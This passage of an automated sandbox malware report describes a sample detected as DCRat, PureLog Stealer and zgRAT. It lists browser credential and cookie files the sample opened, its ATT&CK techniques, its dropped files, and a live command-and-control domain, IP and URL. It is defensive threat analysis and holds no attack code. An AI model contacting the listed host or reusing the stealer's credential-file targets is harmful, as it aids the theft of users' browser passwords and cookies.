                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login DataJump to behavior

                          Remote Access Functionality

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 0000000C.00000002.3259059706.00000000055E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3259059706.0000000005929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.2308672698.0000000013281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: hyperbrokerhostNetsvc.exe PID: 5492, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: vVSUwBXtljAfFANPiZBBPFzlgh.exe PID: 4980, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 6.0.hyperbrokerhostNetsvc.exe.c40000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.2002850710.0000000006AB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000000.2263404724.0000000000C42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\hyperbrokerhostNetsvc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\sihost.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: 6.0.hyperbrokerhostNetsvc.exe.c40000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\hyperbrokerhostNetsvc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\sihost.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information11
                          Scripting                          		Valid Accounts141
                          Windows Management Instrumentation                          		11
                          Scripting                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		1
                          OS Credential Dumping                          		1
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		1
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts2
                          Command and Scripting Interpreter                          		1
                          DLL Side-Loading                          		12
                          Process Injection                          		1
                          Deobfuscate/Decode Files or Information                          		LSASS Memory3
                          File and Directory Discovery                          		Remote Desktop Protocol1
                          Data from Local System                          		2
                          Non-Application Layer Protocol                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                          Obfuscated Files or Information                          		Security Account Manager157
                          System Information Discovery                          		SMB/Windows Admin Shares1
                          Clipboard Data                          		12
                          Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                          Software Packing                          		NTDS361
                          Security Software Discovery                          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading                          		LSA Secrets2
                          Process Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts113
                          Masquerading                          		Cached Domain Credentials261
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                          Virtualization/Sandbox Evasion                          		DCSync1
                          Application Window Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                          Process Injection                          		Proc Filesystem1
                          Remote System Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                          System Network Configuration Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1403707 Sample: hT7clR9Gz2.exe Startdate: 05/03/2024 Architecture: WINDOWS Score: 100 59 h172956.srv11.test-hf.su 2->59 63 Snort IDS alert for network traffic 2->63 65 Antivirus detection for URL or domain 2->65 67 Antivirus detection for dropped file 2->67 69 10 other signatures 2->69 11 hT7clR9Gz2.exe 3 6 2->11         started        signatures3 process4 file5 47 C:\PortCommon\hyperbrokerhostNetsvc.exe, PE32 11->47 dropped 49 C:\...\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe, data 11->49 dropped 14 wscript.exe 1 11->14         started        process6 signatures7 83 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->83 17 cmd.exe 1 14->17         started        process8 process9 19 hyperbrokerhostNetsvc.exe 3 28 17->19         started        23 conhost.exe 17->23         started        file10 39 C:\Users\user\Desktop\rZIMgllI.log, PE32 19->39 dropped 41 C:\Users\user\Desktop\qtoWZHQP.log, PE32 19->41 dropped 43 C:\Users\user\Desktop\mmqNDpWU.log, PE32 19->43 dropped 45 15 other malicious files 19->45 dropped 71 Antivirus detection for dropped file 19->71 73 Multi AV Scanner detection for dropped file 19->73 75 Detected unpacking (creates a PE file in dynamic memory) 19->75 77 2 other signatures 19->77 25 cmd.exe 1 19->25         started        signatures11 process12 signatures13 79 Uses ping.exe to sleep 25->79 81 Uses ping.exe to check the status of other devices and networks 25->81 28 vVSUwBXtljAfFANPiZBBPFzlgh.exe 14 514 25->28         started        33 conhost.exe 25->33         started        35 PING.EXE 1 25->35         started        37 chcp.com 1 25->37         started        process14 dnsIp15 61 h172956.srv11.test-hf.su 91.227.16.11, 49712, 49713, 49716 EXIMIUS-ASRU Russian Federation 28->61 51 C:\Users\user\Desktop\tAUMwPQX.log, PE32 28->51 dropped 53 C:\Users\user\Desktop\sDsEbPBc.log, PE32 28->53 dropped 55 C:\Users\user\Desktop\rMQELCVZ.log, PE32 28->55 dropped 57 11 other malicious files 28->57 dropped 85 Tries to harvest and steal browser information (history, passwords, etc) 28->85 file16 signatures17

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          hT7clR9Gz2.exe55%ReversingLabsByteCode-MSIL.Trojan.Uztuby
                          hT7clR9Gz2.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\Desktop\MjOKfqVp.log100%AviraHEUR/AGEN.1362695
                          C:\Users\user\Desktop\DjncgsWF.log100%AviraHEUR/AGEN.1300079
                          C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe100%AviraHEUR/AGEN.1339906
                          C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe100%AviraVBS/Runner.VPG
                          C:\Users\user\Desktop\NcaIHEGQ.log100%AviraHEUR/AGEN.1300079
                          C:\Users\user\Desktop\CNmCQxgq.log100%AviraHEUR/AGEN.1300079
                          C:\Users\user\Desktop\RFZqtRqa.log100%AviraHEUR/AGEN.1300079
                          C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe100%AviraHEUR/AGEN.1339906
                          C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe100%AviraHEUR/AGEN.1339906
                          C:\PortCommon\hyperbrokerhostNetsvc.exe100%AviraHEUR/AGEN.1339906
                          C:\PortCommon\sihost.exe100%AviraHEUR/AGEN.1339906
                          C:\Users\user\Desktop\YQFyrQBy.log100%AviraHEUR/AGEN.1300079
                          C:\Users\user\Desktop\hgVgFZAw.log100%AviraHEUR/AGEN.1300079
                          C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\EgPkCslz.log100%Joe Sandbox ML
                          C:\Users\user\Desktop\RFZqtRqa.log100%Joe Sandbox ML
                          C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe100%Joe Sandbox ML
                          C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe100%Joe Sandbox ML
                          C:\PortCommon\hyperbrokerhostNetsvc.exe100%Joe Sandbox ML
                          C:\PortCommon\sihost.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\aSrhMzGt.log100%Joe Sandbox ML
                          C:\PortCommon\hyperbrokerhostNetsvc.exe88%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\PortCommon\sihost.exe88%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe88%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe88%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe88%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\AyILZeLM.log8%ReversingLabs
                          C:\Users\user\Desktop\BvjTveaH.log12%ReversingLabs
                          C:\Users\user\Desktop\CNmCQxgq.log17%ReversingLabs
                          C:\Users\user\Desktop\DKOKmxvl.log12%ReversingLabs
                          C:\Users\user\Desktop\DjncgsWF.log62%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\EgPkCslz.log5%ReversingLabs
                          C:\Users\user\Desktop\EySSXLrj.log9%ReversingLabs
                          C:\Users\user\Desktop\HAEBtuve.log13%ReversingLabs
                          C:\Users\user\Desktop\MjOKfqVp.log12%ReversingLabs
                          C:\Users\user\Desktop\NcaIHEGQ.log17%ReversingLabs
                          C:\Users\user\Desktop\PZEBmnVi.log17%ReversingLabs
                          C:\Users\user\Desktop\RFZqtRqa.log4%ReversingLabs
                          C:\Users\user\Desktop\VWqPFTQA.log12%ReversingLabs
                          C:\Users\user\Desktop\VeZikCqF.log8%ReversingLabs
                          C:\Users\user\Desktop\WSdqVQmD.log10%ReversingLabs
                          C:\Users\user\Desktop\YQFyrQBy.log62%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\ZzoyrgAK.log12%ReversingLabs
                          C:\Users\user\Desktop\aSrhMzGt.log5%ReversingLabs
                          C:\Users\user\Desktop\dqepydAD.log13%ReversingLabs
                          C:\Users\user\Desktop\fFJfpvVh.log12%ReversingLabs
                          C:\Users\user\Desktop\hgVgFZAw.log17%ReversingLabs
                          C:\Users\user\Desktop\kWLWNWBq.log9%ReversingLabs
                          C:\Users\user\Desktop\mmqNDpWU.log4%ReversingLabs
                          C:\Users\user\Desktop\qtoWZHQP.log12%ReversingLabs
                          C:\Users\user\Desktop\rMQELCVZ.log12%ReversingLabs
                          C:\Users\user\Desktop\rZIMgllI.log17%ReversingLabs
                          C:\Users\user\Desktop\sDsEbPBc.log10%ReversingLabs
                          C:\Users\user\Desktop\tAUMwPQX.log17%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://h172956.srv11.test-hf.su80%Avira URL Cloudsafe
                          http://h172956.srv11.test-hf.su/100%Avira URL Cloudmalware
                          http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php(gI100%Avira URL Cloudmalware
                          http://h172956.srv11.test-hf.su100%Avira URL Cloudmalware
                          http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php100%Avira URL Cloudmalware

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          h172956.srv11.test-hf.su
                          		91.227.16.11
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.phptrue
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://ac.ecosia.org/autocomplete?q=vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drfalse
                              		high
                              https://duckduckgo.com/chrome_newtabvVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drfalse
                                		high
                                http://h172956.srv11.test-hf.su/vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://duckduckgo.com/ac/?q=vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drfalse
                                  		high
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icovVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drfalse
                                    		high
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchvVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drfalse
                                      		high
                                      http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php(gIvVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000547C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drfalse
                                        		high
                                        http://h172956.srv11.test-hf.su8vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 